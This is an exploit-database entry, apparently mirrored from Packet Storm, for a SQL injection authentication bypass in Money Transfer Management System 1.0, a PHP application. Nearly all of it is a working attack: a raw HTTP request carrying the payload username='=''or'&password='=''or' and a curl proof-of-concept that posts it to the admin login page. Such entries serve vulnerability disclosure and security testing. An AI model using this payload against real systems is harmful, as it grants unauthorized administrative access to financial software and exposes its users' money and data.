Exploit for Money Transfer Management System 1.0 SQL Injection

Name: Exploit for Money Transfer Management System 1.0 SQL Injection
Rating: 5 (304 reviews)

2021-11-08 | CVSS 7.1

## https://sploitus.com/exploit?id=PACKETSTORM:164796
# Exploit Title: Money Transfer Management System 1.0 - Authentication Bypass  
# Date: 2021-11-07  
# Exploit Author: Aryan Chehreghani  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html  
# Version: 1.0  
# Tested on: Windows 10  
# Admin panel authentication bypass  
  
Admin panel authentication can be bypassed due to a SQL injection in the login form:  
  
Request:  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://localhost/mtms/admin/login.php  
Content-Length: 37  
Cookie: PHPSESSID=8jff4m81f5j0ej125k1j9rdrc3  
Connection: keep-alive  
  
username='=''or'&password='=''or'  
  
PoC:  
curl -d "username='=''or'&password='=''or'" -X POST http://localhost/mtms/admin/login.php